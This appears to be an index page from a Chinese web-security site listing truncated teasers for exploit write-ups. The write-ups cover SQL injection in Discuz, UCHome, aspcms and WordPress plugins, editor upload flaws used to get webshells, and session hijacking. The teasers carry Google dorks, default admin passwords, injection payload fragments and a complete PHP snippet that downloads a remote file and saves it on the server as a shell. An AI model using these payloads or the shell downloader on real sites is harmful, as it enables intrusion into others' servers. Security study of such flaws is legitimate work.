中企在线企业注入和编辑器拿shell及修复 - 网站安关注热度:16

inurl:products.asp?c_id=大部分英文En/Index.asp 部分存在注入漏洞不行的话可以中转注入默认表段manager www.2cto.com默认子段managerName managerPassword默认账号密码htadmin sfoht0574后台拿webshell方法.....[详情]

YFCMS之ewebeditor上传漏洞及修复 - 网站安全 - 自学关注热度:10

FROM WWW.ST999.CN/BLOG BY 流浪的风google关键字：intext:版权所有:yfcms利用文件：admin\WebEditor\asp\upload.asp利用代码：form action=http://www.2cto.com /admin/WebEditor\asp\upload.asp?acti.....[详情]

WordPress TimThumb 插件漏洞关键点和几个有意思的地关注热度:32

前几天国外暴了个WordPress TimThumb 插件的漏洞，这个插件很多WordPress主题都用了，包括国内某某付费主题，这里我就不多说了，以免小黑去搞人家BLOG。http://code.google.com/p/timthumb/source/bro..[详情]

phpMyRealty <= v. 1.0.7 SQL注射缺陷及修复 - 网站安关注热度:21

标题: [phpMyRealty = v. 1.0.7 SQL Injection Vulnerability]关键词: [intext:Sort By: Submission Date | Bedrooms | Bathrooms |Price (ASC) | Price (DESC)]作者: [H4T$A]下载: [htt.....[详情]

某建筑装饰公司0day及修复 - 网站安全 - 自学php关注热度:26

作者：脚本小子Google搜索：inurl:xxhs.asp?classid=漏洞eWebEditor5.5拿webshell方法直接进后台eWebEditor/admin/login.asp默认账号密码 admin admin登陆后台点击样式管理在popup样式管理修改路径模式：选择..[详情]

NetBIOS的危害和安全防范 - 网站安全 - 自学php关注热度:23

许多人知道，NetBIOS 是计算机局域网领域流行的一种传输方式，但你是否还知道，对于互联网用户来讲，NetBIOS 则是安全领域的一大隐患。一、 NetBIOS 的烦恼 NetBIOS 是指网络输入输出系统..[详情]

discuz sessoin hijack tips 续 - 网站安全 - 自学php关注热度:34

前面发的是UCHOME：http://www.2cto.com/Article/201108/100740.html为免有装B的嫌疑，干脆DISCUZ论坛的SESSION劫持方法也一并公布了。转载请保留原始URL，谢谢.DISCUZ X系列论坛的session和UCHOME不同，生成..[详情]

Discuz 1.5 - 2.0 二次注入细节(已出补丁) - 网站安全关注热度:29

By：jannock今天才发现，discuz 昨天又出补丁了。唉，又少一个玩了。这里说一下细节让大家共同学习一下吧。在发表回复的地方输入注入语句：a#39;,`subject`=(/*!select*/ concat(username,#39;|#39;..[详情]

Http指纹识别技术 - 网站安全 - 自学php关注热度:32

编外 从作者判断，这也是篇老文章了作者：欲望之翼 出处：浪客联盟Http指纹识别现在已经成为应用程序安全中一个新兴的话题,Http服务器和Http应用程序安全也已经成为网络安全中的重..[详情]

简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕关注热度:15

话说文章写得菜不要紧，首先标题要跟大牛一样！作者：单恋一支花 出自：t00ls 转载请注明出处，如有雷同，纯属别人抄袭，嘿嘿！一：写在前面今天晚上想老婆了，失眠了，蛋裂之余..[详情]

云起企业建站系统通杀oday及修复 - 网站安全 - 自关注热度:26

编外：一年前发出来的了，叫0day不合适了文章作者：围剿文章来源：邪恶十进制为什么说是通杀呢 因为这个系统虽然是版本提高了不少 但是漏洞依然存在 而且很明显使我等小菜爽了一..[详情]

discuz sessoin hijack tips - 网站安全 - 自学php关注热度:41

捂了N年的一个东西，今天公布了吧。当通过DISCUZ系列程序的SQL注入漏洞，获得用户的HASH和ucenter的uckey后，其实是可以直接构造管理员的session的，然后在前台以管理员的身份做任何操作..[详情]

mysql暴错注入的科普 3 - 网站安全 - 自学php关注热度:15

from：RAyh4c的黑盒子跨库爆出uckey，跨库到ucenter进行查询，这里我就不详叙了，都截图吧。爆出数据库的个数profilesubmit=1formhash=232d1c54info[a#39;,(select 1 from(select count(*),concat((SELECT.....[详情]

mysql暴错注入的科普 2 - 网站安全 - 自学php关注热度:20

通过前面SQL错误信息获得了表前缀，那么直接就可以爆用户名为admin的hash向cp.php?ac=profileop=info POST提交参数：profilesubmit=1formhash=232d1c54info[a#39;,(select 1 from(select count(*),conca.....[详情]

mysql暴错注入的科普 1 - 网站安全 - 自学php关注热度:23

抽uchome两个老的SQL注入漏洞举例，漏洞很久以前就被人公布过了，两个SQL注入都在个人资料更新的流程里：注册变量的代码KEY的内容直接进入了$inserts数组foreach ($_POST[#39;friend#39;] as $ke..[详情]

aspcms 2.1.4 GBK版注入漏洞及修复 - 网站安全 - 自学关注热度:42

流浪的风下载：http://www.2cto.com/ym/201108/29078.html程序:aspcms2.1.4 GBK版其他版本详细测试，貌似是只存在这个版本admin/_content/_About/AspCms_AboutEdit.asp未验证权限，且存在注入漏洞利用EXP：admi...[详情]

postgresql注入和管理小记 - 网站安全 - 自学php关注热度:47

Author：LengF PostTime:2011-08-17 相信大家平时关注最多的是Mysql和MSSQL，当然了Oracle也已经备受关注。但是一些比较少见的数据库，比如DB2，Postgresql，Sybase ASE，Informix。如果不知道这些数据库..[详情]

PostgreSQL注入整理 - 网站安全 - 自学php关注热度:29

2011年01月26日 星期三 上午 01:525432端口/*order by猜字段数*/http://www.2cto.com /detail.php?id=236+order+by+26--/*判断postgresql数据库*/http://www.2cto.com /detail.php?id=236+and+1::int=1--/.....[详情]

判断目标网站采用的织梦DedeCms版本的方法 - 网站关注热度:22

这个方法可以判断出目标网站所使用的织梦dedecms是哪个版本的，打了哪一天的补丁。在需要判断网站织梦版本的的URL路径后面添加/data/admin/ver.txt如官方的：http://www.dedecms.com/data/admin/v..[详情]

PKI技术原理 - 网站安全 - 自学php关注热度:21

对称加密 symmetric cryptographic非对称加密 asymmetric cryptographic密钥交换协议 key agreement/exchange哈希算法 Hash报文认证码 MAC数字签名 digital signature数字证书 digital ID/certifica.....[详情]

WordPress插件File Groups <= 1.1.2 SQL注射缺陷及修复关注热度:26

标题: WordPress File Groups plugin = 1.1.2 SQL Injection Vulnerability时间: 2011-08-17作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)下载地址: http://downloads.wor.....[详情]

WordPress插件Contus HD FLV Player <= 1.3 SQL注射缺陷及关注热度:16

标题: WordPress Contus HD FLV Player plugin = 1.3 SQL Injection Vulnerability时间: 2011-08-17作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)下载地址: http://down.....[详情]

Joomla JoomTouch Component本地文件包含缺陷及修复 -关注热度:16

JoomTouch Joomla Component = Local File Inclusion Vulnerability Software : com_joomtouch ver 1.0.2 Vendor : http://www.joomtouch.com/测试方法： http://www.2cto.com /[path]/index......[详情]

php代码下载shell可过一流信息拦截 - 网站安全 -关注热度:21

down_shell.php -可过一流信息拦截?php$str=file_get_contents($_GET[#39;url#39;]);echo file_put_contents($_GET[#39;file#39;],$str);?use: ?url=http://www.2cto.com/1.txtfile=3.asp代码很简单。.....[详情]

shopex易分销系统存在geshell漏洞及修复 - 网站安全关注热度:19

简要描述：该漏洞可以在后台直接执行任意PHP脚本文件，可以直接获取webshell，拿到整个服务器权限。sn详细说明：首先 在http://shop.fenxiaowang.com/ 免费注册一个账号，获得试用后台地址然..[详情]

shopEx易开店系统遍历文件漏洞及修复 - 网站安全关注热度:22

易开店演示站存在遍历文件漏洞，可以读取到任意文件源码。sn详细说明：首先登陆易开店演示站后台：http://demo.ekaidian.cn/shopadmin/index.php?ctl=passportact=login输入官方提供的试用账户，进入..[详情]

80After CMS V4 鸡肋上传漏洞及修复 - 网站安全 - 自关注热度:26

By：小A 官方网址:http://www.reaft.com/ Cms下载地址:http://www.2cto.com/ym/201102/26373.html 界面做的还不错，搜索了一下好像用的人很少，开始。 首先看目录下 UpLoad.html 文件上传，调用了的是 Up....[详情]

关于MYSQL into outfile注射 - 网站安全 - 自学php关注热度:22

其实网上已经有很多关于mysql注射的文章了~ 不过还是缺乏重点吧~ 要使用 into outfile 把代码写到web目录取得WEBSHELL首先需要 3大先天条件①知道物理路径(into outfile #39;物理路径#39;) 这样才..[详情]

Discuz X2 SQL注入/Xpath缺陷及修复 - 网站安全 - 自学关注热度:30

漏洞类型：SQL注入/Xpath请求方式：POST影响页面：http://www.2cto.com /member.php?mod=loggingaction=loginloginsubmit=yesinfloat=yeslssubmit=yes参数:username参数测试：and 1=1攻击细节：username=1.....[详情]

PhpMyadmin XSRF 缺陷 (执行sql查询)及修复 - 网站安全关注热度:37

# Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)# Author: Caddy-Dz# Facebook Page: www.facebook.com/islam.caddy# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-.....[详情]